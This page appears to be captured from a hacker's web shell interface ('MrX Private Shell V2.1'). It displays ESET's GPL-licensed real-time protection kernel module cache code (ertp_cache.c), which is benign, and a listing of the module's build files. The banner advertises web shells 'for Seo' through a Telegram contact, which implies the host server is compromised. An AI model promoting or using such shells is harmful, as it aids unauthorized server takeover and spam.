__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/*
* eset_rtp (ESET Real-time file system protection module)
* Copyright (C) 1992-2025 ESET, spol. s r.o.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>.
*
* In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
*/
#include "ertp_cache.h"
#include "ertp.h"
#include "ertp_cache_container.h"
#include "ertp_logs.h"
struct ertp_cache_t {
struct rb_root root;
struct list_head list;
size_t size;
size_t max_size;
};
static DEFINE_MUTEX(ertp_cache_mutex);
static struct ertp_cache_t ertp_cache = {
.root = RB_ROOT,
.list = LIST_HEAD_INIT(ertp_cache.list),
.size = 0,
.max_size = 10000,
};
int ertp_cache_init(void) {
int err = ertp_cache_item_allocator_init();
if (unlikely(err)) {
return err;
}
return 0;
}
void ertp_cache_deinit(void) {
ertp_cache_clear();
ertp_cache_item_allocator_deinit();
}
static void ertp_cache_remove_internal_unlocked(struct ertp_cache_item *item) {
--ertp_cache.size;
list_del_init(&item->time_list);
ertp_cache_container_erase(&ertp_cache.root, item);
}
static inline unsigned convert_event_type(enum ertp_event_type type) {
switch (type) {
case ERTP_EVENT_TYPE_OPEN:
return ERTP_CACHE_ET_OPEN;
case ERTP_EVENT_TYPE_CLOSE:
return ERTP_CACHE_ET_CLOSE;
case ERTP_EVENT_TYPE_EXEC:
return ERTP_CACHE_ET_EXEC;
default:
BUG();
}
return 0;
}
enum ertp_cache_result_t ertp_cache_check(
const struct ertp_event_generic_info *event_info) {
enum ertp_cache_result_t result = ERTP_CACHE_NOT_FOUND;
struct ertp_cache_item *item;
struct ertp_cache_key key = {
.ino = event_info->attr_info.ino,
.dev = new_encode_dev(event_info->attr_info.dev)};
mutex_lock(&ertp_cache_mutex);
item = ertp_cache_container_find(&ertp_cache.root, &key, NULL);
if (!item) {
ertp_pr_trace(ERTP_LOG_CACHE,
"cached result for event %d (%s), ino %lld, dev %lld and "
"path %s not found",
event_info->type, ertp_event_type_to_str(event_info->type),
key.ino, key.dev, event_info->file_path->ptr);
goto exit;
}
if (!ertp_timespec_equal(item->ctime, event_info->attr_info.ctime)) {
result = ERTP_CACHE_MODIFIED;
ertp_pr_trace(ERTP_LOG_CACHE,
"cached result for event %d (%s), ino %lld, dev %lld and "
"path %s is obsolete",
event_info->type, ertp_event_type_to_str(event_info->type),
key.ino, key.dev, event_info->file_path->ptr);
ertp_cache_remove_internal_unlocked(item);
goto exit;
}
if (!(item->event_type & convert_event_type(event_info->type))) {
ertp_pr_trace(ERTP_LOG_CACHE,
"cached result for event %d (%s), ino %lld, dev %lld and "
"path %s not found (only event with mask %d present)",
event_info->type, ertp_event_type_to_str(event_info->type),
key.ino, key.dev, event_info->file_path->ptr,
item->event_type);
goto exit;
}
ertp_pr_trace(
ERTP_LOG_CACHE,
"cached result for event %d (%s), ino %lld, dev %lld and path %s found",
event_info->type, ertp_event_type_to_str(event_info->type), key.ino,
key.dev, event_info->file_path->ptr);
result = ERTP_CACHE_FOUND;
list_move_tail(&item->time_list, &ertp_cache.list);
exit:
mutex_unlock(&ertp_cache_mutex);
return result;
}
void ertp_cache_remove(uint64_t ino, uint64_t dev) {
struct ertp_cache_item *item;
struct ertp_cache_key key = {
.ino = ino,
.dev = dev,
};
mutex_lock(&ertp_cache_mutex);
item = ertp_cache_container_find(&ertp_cache.root, &key, NULL);
if (item) {
ertp_pr_trace(ERTP_LOG_CACHE,
"removing obsolete item in cache with ino %lld and dev %lld,",
item->key.ino, item->key.dev);
ertp_cache_remove_internal_unlocked(item);
}
mutex_unlock(&ertp_cache_mutex);
}
void ertp_cache_add(uint64_t ino, uint64_t dev, enum ertp_event_type type,
ertp_timespec_t ctime) {
struct ertp_cache_item *item;
struct ertp_cache_key key = {
.ino = ino,
.dev = dev,
};
mutex_lock(&ertp_cache_mutex);
item = ertp_cache_container_add(&ertp_cache.root, &key, ctime,
convert_event_type(type));
if (unlikely(!item)) {
goto exit;
}
if (list_empty(&item->time_list)) {
list_add_tail(&item->time_list, &ertp_cache.list);
++ertp_cache.size;
ertp_pr_trace(
ERTP_LOG_CACHE,
"adding item to cache with ino: %lld, dev: %lld, (cache size: %lu)",
ino, dev, ertp_cache.size);
if (ertp_cache.size > ertp_cache.max_size) {
item =
list_entry(ertp_cache.list.next, struct ertp_cache_item, time_list);
ertp_cache_remove_internal_unlocked(item);
ertp_pr_trace(ERTP_LOG_CACHE,
"removing oldest item in cache with ino %lld and dev %lld",
item->key.ino, item->key.dev);
}
} else {
list_move_tail(&item->time_list, &ertp_cache.list);
ertp_pr_trace(ERTP_LOG_CACHE,
"updating item to cache with ino: %lld, dev: %lld", ino, dev);
}
exit:
mutex_unlock(&ertp_cache_mutex);
}
void ertp_cache_set_size(size_t max_size) {
mutex_lock(&ertp_cache_mutex);
ertp_cache.max_size = max_size;
mutex_unlock(&ertp_cache_mutex);
}
size_t ertp_cache_get_size(void) {
size_t result;
mutex_lock(&ertp_cache_mutex);
result = ertp_cache.max_size;
mutex_unlock(&ertp_cache_mutex);
return result;
}
void ertp_cache_clear(void) {
struct rb_root old_tree;
mutex_lock(&ertp_cache_mutex);
old_tree = ertp_cache.root;
INIT_LIST_HEAD(&ertp_cache.list);
ertp_cache.root = RB_ROOT;
ertp_cache.size = 0;
mutex_unlock(&ertp_cache_mutex);
ertp_cache_container_clear(&old_tree);
ertp_pr_trace(ERTP_LOG_CACHE, "cache has been flushed");
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .ertp_array.o.cmd | File | 67.01 KB | 0644 |
|
| .ertp_cache.o.cmd | File | 62.05 KB | 0644 |
|
| .ertp_cache_container.o.cmd | File | 51.03 KB | 0644 |
|
| .ertp_debug.o.cmd | File | 61.29 KB | 0644 |
|
| .ertp_dev.o.cmd | File | 70.46 KB | 0644 |
|
| .ertp_event.o.cmd | File | 62.23 KB | 0644 |
|
| .ertp_event_check.o.cmd | File | 62.68 KB | 0644 |
|
| .ertp_excludes.o.cmd | File | 50.98 KB | 0644 |
|
| .ertp_ftrace_hook.o.cmd | File | 88.2 KB | 0644 |
|
| .ertp_ftrace_utils.o.cmd | File | 75.37 KB | 0644 |
|
| .ertp_handlers.o.cmd | File | 88.06 KB | 0644 |
|
| .ertp_handlers_close.o.cmd | File | 88.18 KB | 0644 |
|
| .ertp_handlers_execve.o.cmd | File | 88.54 KB | 0644 |
|
| .ertp_handlers_exit.o.cmd | File | 88.51 KB | 0644 |
|
| .ertp_handlers_mmap.o.cmd | File | 88.69 KB | 0644 |
|
| .ertp_handlers_module.o.cmd | File | 88.39 KB | 0644 |
|
| .ertp_handlers_open.o.cmd | File | 88.58 KB | 0644 |
|
| .ertp_handlers_rename.o.cmd | File | 88.54 KB | 0644 |
|
| .ertp_handlers_unlink.o.cmd | File | 88.54 KB | 0644 |
|
| .ertp_heap.o.cmd | File | 67 KB | 0644 |
|
| .ertp_logs.o.cmd | File | 15.1 KB | 0644 |
|
| .ertp_memory_dev.o.cmd | File | 70.16 KB | 0644 |
|
| .ertp_mod.o.cmd | File | 88.99 KB | 0644 |
|
| .ertp_path.o.cmd | File | 65.63 KB | 0644 |
|
| .ertp_qos.o.cmd | File | 67.84 KB | 0644 |
|
| .ertp_qos_event_data.o.cmd | File | 61.74 KB | 0644 |
|
| .ertp_qos_queue.o.cmd | File | 61.73 KB | 0644 |
|
| .ertp_stats.o.cmd | File | 61.66 KB | 0644 |
|
| .ertp_sysfs.o.cmd | File | 68.08 KB | 0644 |
|
| .eset_rtp.ko.cmd | File | 256 B | 0644 |
|
| .eset_rtp.mod.cmd | File | 612 B | 0644 |
|
| .eset_rtp.mod.o.cmd | File | 67.08 KB | 0644 |
|
| .eset_rtp.o.cmd | File | 139 B | 0644 |
|
| .modules.order.cmd | File | 95 B | 0644 |
|
| Makefile | File | 1.44 KB | 0644 |
|
| ertp.h | File | 2.24 KB | 0644 |
|
| ertp_array.c | File | 4.44 KB | 0644 |
|
| ertp_array.h | File | 2.02 KB | 0644 |
|
| ertp_array.o | File | 37.93 KB | 0644 |
|
| ertp_cache.c | File | 6.42 KB | 0644 |
|
| ertp_cache.h | File | 1.51 KB | 0644 |
|
| ertp_cache.o | File | 152.7 KB | 0644 |
|
| ertp_cache_container.c | File | 4.91 KB | 0644 |
|
| ertp_cache_container.h | File | 1.84 KB | 0644 |
|
| ertp_cache_container.o | File | 38.19 KB | 0644 |
|
| ertp_debug.c | File | 1.32 KB | 0644 |
|
| ertp_debug.h | File | 1.25 KB | 0644 |
|
| ertp_debug.o | File | 14.66 KB | 0644 |
|
| ertp_dev.c | File | 13.64 KB | 0644 |
|
| ertp_dev.o | File | 245.34 KB | 0644 |
|
| ertp_event.c | File | 20.85 KB | 0644 |
|
| ertp_event.h | File | 4.98 KB | 0644 |
|
| ertp_event.o | File | 258.2 KB | 0644 |
|
| ertp_event_check.c | File | 8.15 KB | 0644 |
|
| ertp_event_check.h | File | 1.92 KB | 0644 |
|
| ertp_event_check.o | File | 157.53 KB | 0644 |
|
| ertp_excludes.c | File | 6.42 KB | 0644 |
|
| ertp_excludes.h | File | 1.48 KB | 0644 |
|
| ertp_excludes.o | File | 56.93 KB | 0644 |
|
| ertp_ftrace_hook.c | File | 4.54 KB | 0644 |
|
| ertp_ftrace_hook.h | File | 1.37 KB | 0644 |
|
| ertp_ftrace_hook.o | File | 50.73 KB | 0644 |
|
| ertp_ftrace_utils.c | File | 1.7 KB | 0644 |
|
| ertp_ftrace_utils.h | File | 1.63 KB | 0644 |
|
| ertp_ftrace_utils.o | File | 17.97 KB | 0644 |
|
| ertp_handlers.c | File | 7.86 KB | 0644 |
|
| ertp_handlers.h | File | 1.21 KB | 0644 |
|
| ertp_handlers.o | File | 44.59 KB | 0644 |
|
| ertp_handlers_close.c | File | 3.08 KB | 0644 |
|
| ertp_handlers_close.h | File | 1.72 KB | 0644 |
|
| ertp_handlers_close.o | File | 292.04 KB | 0644 |
|
| ertp_handlers_execve.c | File | 4.37 KB | 0644 |
|
| ertp_handlers_execve.h | File | 1.75 KB | 0644 |
|
| ertp_handlers_execve.o | File | 299.2 KB | 0644 |
|
| ertp_handlers_exit.c | File | 1.97 KB | 0644 |
|
| ertp_handlers_exit.h | File | 1.49 KB | 0644 |
|
| ertp_handlers_exit.o | File | 284.45 KB | 0644 |
|
| ertp_handlers_mmap.c | File | 1.92 KB | 0644 |
|
| ertp_handlers_mmap.h | File | 1.11 KB | 0644 |
|
| ertp_handlers_mmap.o | File | 280.8 KB | 0644 |
|
| ertp_handlers_module.c | File | 4.2 KB | 0644 |
|
| ertp_handlers_module.h | File | 1.53 KB | 0644 |
|
| ertp_handlers_module.o | File | 295.03 KB | 0644 |
|
| ertp_handlers_open.c | File | 3.77 KB | 0644 |
|
| ertp_handlers_open.h | File | 1.72 KB | 0644 |
|
| ertp_handlers_open.o | File | 291.44 KB | 0644 |
|
| ertp_handlers_rename.c | File | 5.14 KB | 0644 |
|
| ertp_handlers_rename.h | File | 1.75 KB | 0644 |
|
| ertp_handlers_rename.o | File | 292.21 KB | 0644 |
|
| ertp_handlers_unlink.c | File | 3.47 KB | 0644 |
|
| ertp_handlers_unlink.h | File | 1.49 KB | 0644 |
|
| ertp_handlers_unlink.o | File | 287.87 KB | 0644 |
|
| ertp_heap.c | File | 9.87 KB | 0644 |
|
| ertp_heap.h | File | 2.04 KB | 0644 |
|
| ertp_heap.o | File | 30 KB | 0644 |
|
| ertp_logs.c | File | 1.14 KB | 0644 |
|
| ertp_logs.h | File | 2.59 KB | 0644 |
|
| ertp_logs.o | File | 10.13 KB | 0644 |
|
| ertp_memory_dev.c | File | 8.34 KB | 0644 |
|
| ertp_memory_dev.h | File | 1.33 KB | 0644 |
|
| ertp_memory_dev.o | File | 224.05 KB | 0644 |
|
| ertp_mod.c | File | 3.18 KB | 0644 |
|
| ertp_mod.o | File | 28.85 KB | 0644 |
|
| ertp_path.c | File | 4.38 KB | 0644 |
|
| ertp_path.h | File | 1.31 KB | 0644 |
|
| ertp_path.o | File | 185.7 KB | 0644 |
|
| ertp_qos.c | File | 17.06 KB | 0644 |
|
| ertp_qos.h | File | 2.18 KB | 0644 |
|
| ertp_qos.o | File | 254.39 KB | 0644 |
|
| ertp_qos_event_data.c | File | 2.41 KB | 0644 |
|
| ertp_qos_event_data.h | File | 1.61 KB | 0644 |
|
| ertp_qos_event_data.o | File | 129.95 KB | 0644 |
|
| ertp_qos_queue.c | File | 4.32 KB | 0644 |
|
| ertp_qos_queue.h | File | 1.98 KB | 0644 |
|
| ertp_qos_queue.o | File | 34.61 KB | 0644 |
|
| ertp_stats.c | File | 8.53 KB | 0644 |
|
| ertp_stats.h | File | 1.53 KB | 0644 |
|
| ertp_stats.o | File | 46.95 KB | 0644 |
|
| ertp_sysfs.c | File | 5.51 KB | 0644 |
|
| ertp_sysfs.o | File | 185.59 KB | 0644 |
|
| ertp_types.h | File | 1.15 KB | 0644 |
|
| eset_rtp.h | File | 4.2 KB | 0644 |
|
| eset_rtp.ko | File | 4.46 MB | 0644 |
|
| eset_rtp.mod | File | 755 B | 0644 |
|
| eset_rtp.mod.c | File | 8.4 KB | 0644 |
|
| eset_rtp.mod.o | File | 159.15 KB | 0644 |
|
| eset_rtp.o | File | 4.29 MB | 0644 |
|
| eset_rtp_sysfs.h | File | 1.26 KB | 0644 |
|
| modules.order | File | 20 B | 0644 |
|